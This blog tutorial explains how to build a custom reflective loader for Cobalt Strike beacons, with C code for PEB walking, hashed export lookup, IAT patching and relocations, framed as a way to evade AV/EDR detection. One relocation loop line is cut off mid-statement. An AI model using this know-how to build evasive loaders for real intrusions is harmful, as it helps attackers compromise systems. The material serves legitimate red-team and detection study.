# Cobalt Strike - User Defined Reflective Loader Studies

## Introduction

What's up people! In this blog post we're gonna dive into Cobalt Strike's User Defined Reflective Loader (UDRL): what it is and how to develop your own :). I must proclaim that what I'm explaining here is NOT new. There are a couple of UDRLs out there already, the most notable being Austin Hudson's ***TitanLdr***, C5pider's ***KaynStrike***, and Boku7's ***BokuLoader***. Custom loaders have also been around for over a couple of decades, with one of the most notable being Stephen Fewer's ***Reflective DLL Injection*** technique.

This blog post is more of a *brain dump* of what I've learnt about **UDRLs** than an official tutorial, as there are still certain aspects I don't fully understand. However, I hope to clarify this concept a bit more and maybe inspire people to look at this feature in Cobalt Strike (CS) and make their own **UDRLs**!

This topic is extensive and unfortunately I won't be able to explain every minor detail, so some prior knowledge of the following concepts will most certainly help you follow the topics discussed.

* C Programming Language
* Windows API
* Windows Portable Executable
* Reflective DLL Injection
* Windows Internals
* Cobalt Strike
* Assembly Language

Don't worry though, I will be providing a lot of resources throughout this blog post to help you understand these concepts further!

## User Defined Reflective Loader

So, what is a User Defined Reflective Loader? First, we should probably take several steps back and get a high level overview of:

1. Portable Executables
2. Reflective DLL Injection

### Portable Executables

What is a [Portable Executable](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) (PE)? Essentially a **PE** is the native Win32 executable file format of the Windows operating system. If you are a Windows user you will have seen these files on your PC/Laptop, for example **.exe** and **.dll** files are both **PEs**.

But what is the point of **PEs**? The **PE** acts as a data structure that tells the Windows OS loader what information is required to manage the wrapped executable code. This information covers dynamic library references for linking, API export and import tables, resource management data etc. In essence the **PE** is like a directory filled with information about the file being loaded from disk into memory.

The **PE** has many sections within it, each holding its own important information (except for the DOS header, it's kinda useless :p) about our file. Here is an example of a **PE's** layout -

<figure><img src="https://2025655796-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MaxwVTT_BnxzQrp_qMJ%2Fuploads%2FRuIuqnoZArFBbP1EMulM%2FWindows_PE.jpg?alt=media&#x26;token=07a22e9a-2eb0-4022-ab4f-13e9077b5a61" alt=""><figcaption></figcaption></figure>

At first glance it looks super confusing, and I'm not gonna lie...it is super confusing when you first learn about **PEs** lol. We'll be going over the sections and headers highlighted in the above image during the coding walkthrough portion of this blog!

### Reflective DLL Injection

Now, some understanding of process injection in general will help a lot with this concept, but I will do my best to keep it as simple as I can :). **Reflective DLL Injection** (RDI) is a technique invented by Stephen Fewer, as previously stated. However, the concept that underpins this technique is known as **Manual Mapping** (MM), which from my research has been around since the late 90's, early 00's!

So what is **RDI**? **RDI** is the technique of loading a [Dynamic-Link Library](https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-libraries) (DLL) from memory so that it never has to touch the disk. This is a useful technique for malware development because AV/EDR products will have a harder time detecting your payload unless they meticulously scan memory.

So how is this technique done? Well, when you need to load a **DLL** in Windows, you call [LoadLibrary](https://msdn.microsoft.com/en-us/library/windows/desktop/ms684175\(v=vs.85\).aspx), which takes the file path of a **DLL** and loads it into memory. However, in our case we're not trying to load from disk. We want to load from memory, and **LoadLibrary** doesn't do that. So we have to create our own **LoadLibrary** functionality.

So essentially for **RDI** we need to load and execute a **DLL** in memory.

Here's an image representation of **RDI** -

<figure><img src="https://2025655796-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MaxwVTT_BnxzQrp_qMJ%2Fuploads%2FscMmqdbp2y4zABO6mtyb%2FRDI.png?alt=media&#x26;token=b5f128f7-9908-4f7b-85f7-382b64d0e6f8" alt=""><figcaption></figcaption></figure>

Again, I'm not gonna lie, this topic can be confusing when you first learn it and trying to represent the concept in an image is well...not that helpful tbh :|, but here it is nonetheless ;p.

So after this massive digression we come full circle to our initial question...

**What is a User Defined Reflective Loader?**

Hopefully, after my shoddy explanations of **PE** and **RDI** you should have an inkling of what a **UDRL** is and does. Essentially, it is **CS** giving you (the operator) the ability to create and use a custom reflective loader within the C2 framework. As an operator this gives us a huge platform to develop a custom payload or post-exploitation beacon with cool features and functionality.

Sounds cool right? But how do we make one?

## UDRL Development

So as we've ascertained, we need to develop a **DLL** that loads itself and executes itself in memory. This procedure can be done via [shellcode](https://en.wikipedia.org/wiki/Shellcode). Shellcode is usually written in Assembly, but doing so is a tedious and tricky task which can go wrong easily. Fortunately for me, people way smarter than myself have developed ways of implementing this concept in C and taking advantage of the C compiler. The concepts discussed in this blog have been documented by security researchers such as **Hasherezade** in her [From a C project, through assembly, to shellcode](https://github.com/vxunderground/VXUG-Papers/blob/main/From%20a%20C%20project%20through%20assembly%20to%20shellcode.pdf) whitepaper, and **Modexp's** [Shellcode: In-Memory Execution of DLL](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/). Implementations of these concepts can also be found within the ***KaynStrike*** and ***TitanLdr*** **UDRLs**.

### Resolving API Addresses in Memory

When a **PE** is loaded from disk, the API calls referenced in its code are resolved through the **Import Address Table** (IAT) of the importing image and the **Export Address Table** (EAT) of the **DLL** that provides each function. These tables are created by the linker at build time, and the Windows loader resolves them at runtime by default. Unfortunately we don't have that luxury, so we must resolve API calls ourselves.

The API functions can be retrieved by using the [**Process Environment Block**](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/pebteb/peb/index.htm) (PEB) which is created at a process' runtime. On execution of the **UDRL** shellcode in our target process, we should be able to locate the **PEB** of the target, and then use that reference to search for the **DLLs** that contain the APIs we wish to load!

Within the **PEB** there are a lot of structures which contain information about the running process. However, the structure we're most concerned with is the **Ldr** structure.

We can gain access to a **PEB** via the structure that points to it, called the [**Thread Environment Block**](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/pebteb/teb/index.htm) (TEB). The **TEB** is accessed via segment registers in assembly. For 32 bit it is the **FS** register and for 64 bit it is the **GS** register. The pointer to the **PEB** is stored within the **TEB** at offset **0x30** (32bit) and **0x60** (64bit).

So, in order to access the **PEB** via C code we can setup a macro to the particular offset relative to the segment register pointing to the **TEB**.

```
#ifdef _WIN64
#define PebLdr __readgsqword(0x60)
#else
#define PebLdr __readfsdword(0x30)
#endif
```

Now, in the **Ldr** structure discussed earlier there is a [linked list](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/singly-and-doubly-linked-lists) which will give us the names of all the **DLLs** loaded in the memory of a running process. This list can be *walked* in order for us to check whether each **DLL** in the list is the **DLL** we need for our APIs. The code below demonstrates this process:

```
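GRP_SEC(E) PVOID LoadPebModule(DWORD Hash) {

	PLDR_DATA_TABLE_ENTRY	  ModuleLdr = NULL;
	PLIST_ENTRY		  PebModule = NULL;
	PLIST_ENTRY		  NextEntry = NULL;

	// Head of the circular list; the head itself is not a module entry
	PebModule = &((PPEB)PebLdr)->Ldr->InLoadOrderModuleList;

	// Start at the first real entry and stop once we are back at the head
	for (NextEntry = PebModule->Flink; NextEntry != PebModule; NextEntry = NextEntry->Flink) {

		// Assumes an LDR_DATA_TABLE_ENTRY definition whose first member is InLoadOrderLinks
		ModuleLdr = (PLDR_DATA_TABLE_ENTRY)NextEntry;

		// Compare the hash of the module's base name against the hash we want
		if (HashFunction(ModuleLdr->BaseDllName.Buffer, ModuleLdr->BaseDllName.Length) == Hash) {

			return ModuleLdr->DllBase;
		}
	}

	// No loaded module matched the hash
	return NULL;
}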
```

Essentially what the code above is doing is accessing one of the linked lists within the **Ldr** structure called **InLoadOrderModuleList**. We point our **NextEntry** variable at the **Flink** member of this list and walk through the list, checking each listed **DLL's** name and length against a hash representation of the **DLL** we want. The **ModuleLdr** variable is a pointer to the **LDR\_DATA\_TABLE\_ENTRY** structure, which is **NTDLL's** record of how a **DLL** is loaded into a process. If our hash and the **DLL** in the list are a match, success! We can then return the **DLL's** base address via the **DllBase** member of **LDR\_DATA\_TABLE\_ENTRY**.
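To play with the idea outside of Windows, here is a minimal portable sketch of the same walk. Everything in it is an assumption made for illustration: **list\_entry** and **mock\_module** are hypothetical stand-ins for **LIST\_ENTRY** and **LDR\_DATA\_TABLE\_ENTRY**, names are plain ASCII rather than UTF-16, and **hash\_name** is a case-insensitive djb2 that is not necessarily the algorithm behind the **HashFunction** used in this post.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for LIST_ENTRY. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Hypothetical stand-in for LDR_DATA_TABLE_ENTRY. */
typedef struct mock_module {
    list_entry  links;      /* kept first so a list_entry* can be cast back */
    const char *base_name;  /* ASCII here; the real BaseDllName is UTF-16 */
    void       *dll_base;
} mock_module;

/* Case-insensitive djb2 (assumed algorithm, for illustration only). */
static uint32_t hash_name(const char *name)
{
    uint32_t hash = 5381;
    for (; *name != '\0'; name++) {
        unsigned char c = (unsigned char)*name;
        if (c >= 'a' && c <= 'z')
            c = (unsigned char)(c - ('a' - 'A'));  /* fold to upper case */
        hash = hash * 33u + c;
    }
    return hash;
}

/* Insert a node at the tail of the circular list. */
static void list_append(list_entry *head, list_entry *node)
{
    node->flink = head;
    node->blink = head->blink;
    head->blink->flink = node;
    head->blink = node;
}

/* Walk from head->flink until we arrive back at the head. */
static void *find_module(list_entry *head, uint32_t wanted)
{
    assert(head != NULL);
    for (list_entry *entry = head->flink; entry != head; entry = entry->flink) {
        mock_module *module = (mock_module *)entry;
        if (hash_name(module->base_name) == wanted)
            return module->dll_base;
    }
    return NULL;
}
```

Hashing the upper-cased name means a lookup for **NTDLL.DLL** still matches an entry recorded as **ntdll.dll**, which is why loaders of this kind usually normalise case before hashing.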

### Looking Up Exports

Once we have the base address of our **DLL** (in our case **ntdll.dll**), we need to find the address of the APIs we'll be using within our code. For our **UDRL** the following APIs will be used -

* **RtlAnsiStringToUnicodeString**
* **NtAllocateVirtualMemory**
* **NtProtectVirtualMemory**
* **LdrGetProcedureAddress**
* **RtlFreeUnicodeString**
* **RtlInitAnsiString**
* **LdrLoadDll**

We can find these functions via the **EAT**. In order to do this we need to traverse the **PE**. Functions are exported by a **DLL** in two ways: by name or by ordinal. The **EAT** is accessed through the [**IMAGE\_EXPORT\_DIRECTORY**](https://programmer.help/blogs/export-table-of-pe-file-image_export_directory.html), which is located via the [**IMAGE\_DATA\_DIRECTORY**](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_data_directory).

If you're not familiar with the **PE** format I'm sure at this stage you're thinking *what on earth is going on!* No problem, this is expected and understanding will come with time lol. However, I'll do my best to explain by walking through the code of the function that will load our exported functions. Below is an example of the code.

```
GRP_SEC(E) PVOID LoadExports(PVOID ZenImage, DWORD Hash) {

	PIMAGE_EXPORT_DIRECTORY		ExportDir	= NULL; 
	PIMAGE_DATA_DIRECTORY		DataDir		= NULL;
	PIMAGE_NT_HEADERS			NtHeaders	= NULL; 
	PIMAGE_DOS_HEADER			DosHeader	= NULL; 

	PDWORD	NameAddress		= NULL;
	PDWORD	FuncAddress		= NULL;
	PWORD	OrdAddress		= NULL;

	DosHeader	= (PIMAGE_DOS_HEADER)ZenImage; 
	

	NtHeaders	= CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew); 
	

	DataDir		= &NtHeaders->OptionalHeader.DataDirectory[0]; 

	if (DataDir->VirtualAddress) {

		ExportDir	= CONVERT(PIMAGE_EXPORT_DIRECTORY, DosHeader, DataDir->VirtualAddress); 
		

		NameAddress 	= CONVERT(PDWORD, DosHeader, ExportDir->AddressOfNames);
	

		FuncAddress 	= CONVERT(PDWORD, DosHeader, ExportDir->AddressOfFunctions); 
		

		OrdAddress	= CONVERT(PWORD, DosHeader, ExportDir->AddressOfNameOrdinals);  
	

		for (DWORD Index = 0; Index < ExportDir->NumberOfNames; Index++) {

			if (HashFunction(CONVERT(PVOID, DosHeader, NameAddress[Index]), 0) == Hash) {

				return CONVERT(PVOID, DosHeader, FuncAddress[OrdAddress[Index]]); 
			}
		}
	}

	return NULL; 
}
```

So, this is where that image presented in the *Portable Executables* section of the blog comes in handy. First thing we need to do is get the start of our image via [**IMAGE\_DOS\_HEADER**](https://0xrick.github.io/win-internals/pe3/). Basically all **PE** files start with the **DOS** header, which occupies the first 64 bytes of the file. This header really doesn't do much except give us the **e\_lfanew** member, an offset that points to the **PE/NT** header portion of our **PE**.
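As a rough illustration of that first hop, the sketch below finds the NT headers inside a raw byte buffer. It is a portable stand-in rather than the loader code from this post: **find\_nt\_headers**, **read\_u16** and **read\_u32** are hypothetical helper names, and the only facts it relies on are the `MZ` magic at offset 0, the **e\_lfanew** field at offset **0x3C**, and the `PE\0\0` signature it points to.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define DOS_MAGIC        0x5A4Du      /* "MZ" read as a little-endian WORD */
#define NT_SIGNATURE     0x00004550u  /* "PE\0\0" read as a little-endian DWORD */
#define E_LFANEW_OFFSET  0x3Cu        /* last field of the 64-byte DOS header */

/* Read little-endian values byte by byte so host endianness does not matter. */
static uint16_t read_u16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t read_u32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns the offset of the NT headers, or -1 if the buffer is not a PE. */
static long find_nt_headers(const uint8_t *image, size_t size)
{
    assert(image != NULL);

    /* The DOS header must be fully present and start with "MZ". */
    if (size < 64 || read_u16(image) != DOS_MAGIC)
        return -1;

    /* e_lfanew must leave room for the 4-byte signature. */
    uint32_t e_lfanew = read_u32(image + E_LFANEW_OFFSET);
    if ((size_t)e_lfanew > size - 4)
        return -1;

    if (read_u32(image + e_lfanew) != NT_SIGNATURE)
        return -1;

    return (long)e_lfanew;
}
```

The bounds checks are there because this sketch treats the buffer as untrusted; the loader in this post skips them since it is parsing an image it shipped itself.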

The **PE** header is the general term for a structure named [**IMAGE\_NT\_HEADERS**](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_nt_headers64). This structure contains important information used by the loader. Within **IMAGE\_NT\_HEADERS** there are 3 members. What we're focused on right now is the **OptionalHeader** member. The name is kinda misleading as it is most certainly not optional with regards to its importance in the **PE** :p! The **OptionalHeader** is a large structure within the **PE**, taking up 224 bytes in a 32 bit image (240 bytes in a 64 bit one), and 128 of those bytes belong to the **DataDirectory**!

In the **DataDirectory** we have a number of...directories lol. There are 16 **IMAGE\_DATA\_DIRECTORY** structures. Each of these relate to a structure within the **PE** file. The structure we're interested in is the **IMAGE\_EXPORT\_DIRECTORY** which is the first structure within the **DataDirectory**.

So essentially this portion of code below from our function is just again walking the PE in order to get us to our export directory structure. The **0** you see is just the index of where the export directory is within the list, 0 == first because you know...computers like to be confusing!

```
DosHeader	= (PIMAGE_DOS_HEADER)ZenImage; 

NtHeaders	= CONVERT(PIMAGE_NT_HEADERS, DosHeader, DosHeader->e_lfanew);  

DataDir		= &NtHeaders->OptionalHeader.DataDirectory[0]; 
```

Now once we reach the **IMAGE\_EXPORT\_DIRECTORY** we need to access the members within it. Each entry within the **DataDirectory** contains the **VirtualAddress** and **Size** of the data structure in question. To access the export structure we need to check that the **VirtualAddress** is non-zero and, if that's the case, point our declared variables at the important members. In our situation the members we need are -

**AddressOfFunctions** - A relative virtual address (RVA) that points to an array of **RVAs** for the functions in a **DLL**.

**AddressOfNames** - An **RVA** that points to an array of **RVAs** for the names of the functions in a **DLL**.

**AddressOfNameOrdinals** - An **RVA** that points to an array of 16 bit values, one per exported name, each giving the index of that name's function in the **AddressOfFunctions** array.

Essentially our **IMAGE\_EXPORT\_DIRECTORY** points to three arrays. What we want to do is iterate through the names array (**NameAddress**), comparing the hash of each name against the hash of the function we want. When the **Index**-th name matches, **OrdAddress\[Index]** gives us the position of that export within the function array. The element of **FuncAddress** at that position holds the function's **RVA**, and adding that **RVA** to the base address of the **PE** image gives us the pointer the function returns.
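The name → ordinal → function indirection is easier to see with the **PE** plumbing stripped away. Below is a minimal sketch under stated assumptions: **mock\_exports** is a hypothetical flattened view of the three arrays, names are compared with **strcmp** instead of hashes, and the result is left as an **RVA** rather than being added to an image base.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical flattened view of the three export arrays. */
typedef struct mock_exports {
    uint32_t         number_of_names;
    const char     **names;          /* parallel to name_ordinals[] */
    const uint16_t  *name_ordinals;  /* each value indexes functions[] */
    const uint32_t  *functions;      /* function RVAs */
} mock_exports;

/* Returns the RVA for `wanted`, or 0 if the name is not exported. */
static uint32_t lookup_export_rva(const mock_exports *exports, const char *wanted)
{
    assert(exports != NULL && wanted != NULL);

    for (uint32_t i = 0; i < exports->number_of_names; i++) {
        if (strcmp(exports->names[i], wanted) == 0) {
            /* The i-th name maps to the i-th ordinal entry ... */
            uint16_t function_index = exports->name_ordinals[i];
            /* ... and that ordinal entry selects the function RVA. */
            return exports->functions[function_index];
        }
    }
    return 0;
}
```

Note that the index of the matching name is never used on the function array directly. Going through the ordinal array is what allows the names to be sorted independently of the functions.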

### Looking Up Imports

Next step is processing the **IAT** of our image loaded into memory. The **IAT** is a table that contains the addresses of functions that are imported from other **DLLs**. When an image is loaded into memory and executed, the **IAT** is used to resolve the addresses of these imported functions so that the image can call them.

The purpose of the function below is to update the **IAT** with the actual addresses of the imported functions. This is necessary because when the image is compiled, the **IAT** contains only the names of the imported functions, not their actual addresses. When the image is loaded into memory, the **IAT** must be updated with the correct addresses of the imported functions so that the image can call them.

Let's step through some code to gain a better understanding.

First thing we need to do is resolve the functions previously mentioned in the *Looking Up Exports* section. This will be done using our **LoadPebModule** and **LoadExports** functions.

```
Resolve.Dll.Ntdll = LoadPebModule(NTDLL_HASH);

	Resolve.Function.RtlAnsiStringToUnicodeString	= LoadExports(Resolve.Dll.Ntdll, RTLANSISTRINGTOUNICODESTRING_HASH);
	Resolve.Function.LdrGetProcedureAddress		= LoadExports(Resolve.Dll.Ntdll, LDRGETPROCEDUREADDRESS_HASH);
	Resolve.Function.RtlFreeUnicodeString		= LoadExports(Resolve.Dll.Ntdll, RTLFREEUNICODESTRING_HASH);
	Resolve.Function.RtlInitAnsiString		= LoadExports(Resolve.Dll.Ntdll, RTLINITANSISTRING_HASH);
	Resolve.Function.LdrLoadDll			= LoadExports(Resolve.Dll.Ntdll, LDRLOADDLL_HASH);
```

Next we need to loop through the **Import Directory**, which is an array of **IMAGE\_IMPORT\_DESCRIPTOR** structures. Each of these structures contains information about one **DLL** our **PE** file imports functions from.

```
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR, *PIMAGE_IMPORT_DESCRIPTOR;
```

The three fields we're interested in are -

* **OriginalFirstThunk -** **RVA** of the table whose entries reference the names (or ordinals) of the imported functions.
* **Name -** **RVA** of the null terminated name of the module to import APIs from.
* **FirstThunk -** **RVA** of the table whose entries end up holding the actual addresses of the functions.

Each descriptor contains **RVAs** that point to arrays of **IMAGE\_THUNK\_DATA** structures. Each entry in these arrays represents information about one imported API.

```
typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;      // PBYTE 
        DWORD Function;             // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;        // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA, * PIMAGE_THUNK_DATA;
```

First thing to do is call the **RtlInitAnsiString** function to initialise the name of the **DLL**. The name of the **DLL** is stored in the **Name** field of the import directory entry and the **RtlInitAnsiString** function initializes an **ANSI** string with a pointer to this data.

Next we call the **RtlAnsiStringToUnicodeString** function to convert the ANSI string to a Unicode string. This is necessary because the **LdrLoadDll** function, which is called later in the loop, expects a Unicode string as its third argument (the **DLL** name). It's worth noting that **LdrLoadDll** is the **ntdll** function that ends up being called when **LoadLibrary** is invoked.

```
for (ImportDesc = (PVOID)ImportDir; ImportDesc->Name != 0; ImportDesc++) {

		Name = CONVERT(PVOID, ZenImage, ImportDesc->Name); 

		Resolve.Function.RtlInitAnsiString(&AniDllName, Name); 

		Status = Resolve.Function.RtlAnsiStringToUnicodeString(&UniDllName, &AniDllName, TRUE);
```

We then call our **LdrLoadDll** function to load the **DLL** into memory. This function returns a handle to the **DLL** in the **DllHandle** variable.

Once we have a handle to our **DLL** we need to initialize two pointers to the start of the **OriginalFirstThunk** (OFT) and the **FirstThunk** (FT) tables for the **DLL**, respectively. These tables contain the entries for the functions that the image imports from the **DLL**. The **OFT** contains the original names of the imported functions as they appeared in the image's import table, while **FT** contains the actual addresses of the imported functions in memory.

```
if (NT_SUCCESS(Status)) {

    Status = Resolve.Function.LdrLoadDll(NULL, 0, &UniDllName, &DllHandle); 

    if (NT_SUCCESS(Status)) {

	OrgThunk	= CONVERT(PIMAGE_THUNK_DATA, ZenImage, ImportDesc->OriginalFirstThunk); 
				

	FirstThunk	= CONVERT(PIMAGE_THUNK_DATA, ZenImage, ImportDesc->FirstThunk); 

```

Now we can iterate through the entries in the **OFT** and **FT** tables. For each entry, we check whether it specifies an imported function by name or by ordinal. If the entry specifies a function by name, we call **LdrGetProcedureAddress** (this is the function that **GetProcAddress** calls when invoked) with that name to look up the address of the function in the **DLL**. If the entry specifies a function by ordinal, we call **LdrGetProcedureAddress** with the ordinal instead. In both cases the corresponding entry in the **FT** table is updated with the address that comes back.

When the loop finishes, the **FT** table will contain the correct addresses of all the imported functions from the **DLL**, and the image will be able to call these functions when it is executed.

```
while (OrgThunk->u1.AddressOfData != 0) {

	if (IMAGE_SNAP_BY_ORDINAL(OrgThunk->u1.Ordinal)) {

		Status = Resolve.Function.LdrGetProcedureAddress(DllHandle, 0, IMAGE_ORDINAL(OrgThunk->u1.Ordinal), &FuncAddr);

		if (NT_SUCCESS(Status)) {

			FirstThunk->u1.Function = FuncAddr;
		}
	}
	else {

		ImportName = CONVERT(PIMAGE_IMPORT_BY_NAME, ZenImage, OrgThunk->u1.AddressOfData);

		Resolve.Function.RtlInitAnsiString(&AniDllName, (PVOID)ImportName->Name);

		Status = Resolve.Function.LdrGetProcedureAddress(DllHandle, &AniDllName, 0, &FuncAddr);

		if (NT_SUCCESS(Status)) {

			FirstThunk->u1.Function = FuncAddr;
		}
	}

	OrgThunk++;

	FirstThunk++;
}
```

Lastly, the loop then calls the **RtlFreeUnicodeString** function to free the memory used by the Unicode string.
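If you want to experiment with the thunk walk without a Windows box, the logic can be sketched portably. The code below is an illustration under assumptions, not the loader from this post: **patch\_iat** and **demo\_resolver** are hypothetical names, the resolver callback stands in for **LdrGetProcedureAddress**, thunks are 64 bit, and the only format details relied upon are the ordinal flag in the top bit and the 2 byte hint that precedes each name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ORDINAL_FLAG64 0x8000000000000000ull  /* same value as IMAGE_ORDINAL_FLAG64 */

/* Stand-in for LdrGetProcedureAddress: name is NULL for ordinal lookups. */
typedef uintptr_t (*resolver_fn)(const char *name, uint16_t ordinal);

/* Hypothetical resolver that knows one name and one ordinal. */
static uintptr_t demo_resolver(const char *name, uint16_t ordinal)
{
    if (name != NULL)
        return strcmp(name, "Sleep") == 0 ? 0x1111u : 0u;
    return ordinal == 7 ? 0x2222u : 0u;
}

/* Walk the zero-terminated lookup table and fill the matching IAT slots.
 * Returns how many slots were patched. */
static size_t patch_iat(const uint8_t *image, const uint64_t *lookup,
                        uint64_t *iat, resolver_fn resolve)
{
    assert(image != NULL && lookup != NULL && iat != NULL && resolve != NULL);

    size_t patched = 0;
    for (size_t i = 0; lookup[i] != 0; i++) {
        uintptr_t address;

        if (lookup[i] & ORDINAL_FLAG64) {
            /* Import by ordinal: the low 16 bits hold the ordinal. */
            address = resolve(NULL, (uint16_t)(lookup[i] & 0xFFFFu));
        } else {
            /* Import by name: skip the 2-byte Hint before the string. */
            const char *name = (const char *)(image + lookup[i] + 2);
            address = resolve(name, 0);
        }

        if (address != 0) {
            iat[i] = address;
            patched++;
        }
    }
    return patched;
}
```

Like the loop above, this sketch leaves an **IAT** slot untouched when a lookup fails. A production loader would probably want to bail out instead, since calling through an unresolved slot will crash.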

### Relocations

Some quick theory to explain what we're doing here. When a **PE** file is created by the linker, the linker has to make an assumption about where the file will be mapped into memory. This assumption leads the linker to hard code the addresses of code and data items within the compiled **PE** file. If the **PE** file is not loaded at the base address hard-coded into the file...we have a problem. To get around this issue, the locations of the hard-coded addresses are recorded in the **.reloc** section of the image. This section allows the **PE** loader to fix the addresses in the loaded image.

The entries within the **.reloc** section are called *base relocations* as they depend on the base address of the loaded image. This is just a list of locations in the image. The base relocation entries are allocated in a series of variable length chunks, with each chunk representing the relocations for one 4KB page in the image.

So, for our function we need to process a directory of image base relocations for an image in memory. The directory is an array of **IMAGE\_BASE\_RELOCATION** structures.

```
typedef struct _IMAGE_BASE_RELOCATION {
  DWORD   VirtualAddress;
  DWORD   SizeOfBlock;
} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;
```

The **VirtualAddress** field specifies the virtual address of the first byte of the page where the base relocations are applied. The **SizeOfBlock** field specifies the size of the block, in bytes, including the **IMAGE\_BASE\_RELOCATION** structure and all of the **IMAGE\_RELOC** structures that follow it.

The **IMAGE\_RELOC** structure is defined as follows:

```
typedef struct _IMAGE_RELOC {
    WORD Offset : 12;
    WORD Type : 4;
} IMAGE_RELOC, * PIMAGE_RELOC;
```
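Since each entry is just a 16 bit word, it can also be decoded with shifts and masks, which avoids depending on how a given compiler lays out bit-fields. A minimal sketch with hypothetical helper names (**reloc\_entry\_count**, **reloc\_type**, **reloc\_offset**) follows, assuming the type lives in the top 4 bits and the offset in the low 12 bits.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define BLOCK_HEADER_SIZE 8u  /* VirtualAddress + SizeOfBlock, two DWORDs */

/* Number of 16-bit entries that follow the block header. */
static size_t reloc_entry_count(uint32_t size_of_block)
{
    assert(size_of_block >= BLOCK_HEADER_SIZE);
    return (size_of_block - BLOCK_HEADER_SIZE) / sizeof(uint16_t);
}

/* Top 4 bits: relocation type (0 = ABSOLUTE, 3 = HIGHLOW, 10 = DIR64). */
static unsigned reloc_type(uint16_t entry)
{
    return (unsigned)entry >> 12;
}

/* Low 12 bits: offset from the start of the block's 4KB page. */
static unsigned reloc_offset(uint16_t entry)
{
    return entry & 0x0FFFu;
}
```

A 12 bit offset can address exactly 4096 bytes, which is why each block covers a single 4KB page.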

First we need to initialise a pointer to the start of the relocation directory, then initialise a variable to the difference between the image base address of where the file is loaded in memory and the image base address that was specified when the image was compiled. This difference is referred to as the **delta**.

```
ImgBaseReloc	= (PVOID)BaseRelocDir; 

Delta		= (PVOID)((ULONG_PTR)ZenImage - (ULONG_PTR)ImageBase);
```

The function then enters a loop that iterates over all of the blocks in the relocation directory. For each block, it initializes a pointer to the start of the block and enters another loop that iterates over all of the relocations in the block.

```
for (; ImgBaseReloc->VirtualAddress != 0; ImgBaseReloc = (PVOID)Relocation) {

	Relocation = (PIMAGE_RELOC)(ImgBaseReloc + 1); 

	for (; (PBYTE)Relocation != CONVERT(PBYTE, ImgBaseReloc, ImgBaseReloc->SizeOfBlock); R
```

For each relocation, the function reads the **Type** field and applies the relocation based on the value of this field. There are several different types of relocations that can be applied, but the function only handles three of them.

**IMAGE\_REL\_BASED\_DIR64** and **IMAGE\_REL\_BASED\_HIGHLOW** are combined within a macro called **IMAGE\_REL\_TYPE**, while **IMAGE\_REL\_BASED\_ABSOLUTE** is just used as padding so that the next relocation block is aligned on a 4-byte boundary.

```
switch (Relocation->Type) {

	case IMAGE_REL_BASED_ABSOLUTE:

		// Padding entry, nothing to fix up
		break;

	case IMAGE_REL_TYPE:

		// Add the delta to the address stored at this location
		*(ULONG_PTR*)((PBYTE)ZenImage + ImgBaseReloc->VirtualAddress + Relocation->Offset) += (ULONG_PTR)Delta;

		break;
}
```
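Putting the pieces together, here is a portable sketch of the whole fix-up pass over a plain byte buffer. It is a simplified illustration under assumptions rather than the function from this post: **apply\_relocations** is a hypothetical name, only 64 bit (**DIR64**) entries are handled, the host is assumed to be little-endian like the **PE** format, and the directory is assumed to end with a block whose **VirtualAddress** is 0.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define REL_ABSOLUTE 0u   /* IMAGE_REL_BASED_ABSOLUTE: padding */
#define REL_DIR64    10u  /* IMAGE_REL_BASED_DIR64 */

/* memcpy-based loads avoid unaligned access; host must be little-endian. */
static uint32_t load_u32(const uint8_t *p) { uint32_t v; memcpy(&v, p, sizeof v); return v; }
static uint16_t load_u16(const uint8_t *p) { uint16_t v; memcpy(&v, p, sizeof v); return v; }

/* Adds delta to every DIR64 target. Returns the number of fix-ups applied. */
static size_t apply_relocations(uint8_t *image, const uint8_t *reloc_dir, int64_t delta)
{
    assert(image != NULL && reloc_dir != NULL);

    size_t fixed = 0;
    const uint8_t *block = reloc_dir;
    uint32_t page_rva;

    /* A block with VirtualAddress 0 terminates the directory. */
    while ((page_rva = load_u32(block)) != 0) {
        uint32_t block_size = load_u32(block + 4);
        if (block_size < 8)
            break;  /* malformed block, stop rather than loop forever */

        /* Entries start right after the 8-byte block header. */
        for (uint32_t off = 8; off + 2 <= block_size; off += 2) {
            uint16_t entry = load_u16(block + off);
            if ((entry >> 12) != REL_DIR64)
                continue;  /* skips REL_ABSOLUTE padding and unhandled types */

            uint8_t *target = image + page_rva + (entry & 0x0FFFu);
            uint64_t value;
            memcpy(&value, target, sizeof value);
            value += (uint64_t)delta;
            memcpy(target, &value, sizeof value);
            fixed++;
        }
        block += block_size;
    }
    return fixed;
}
```

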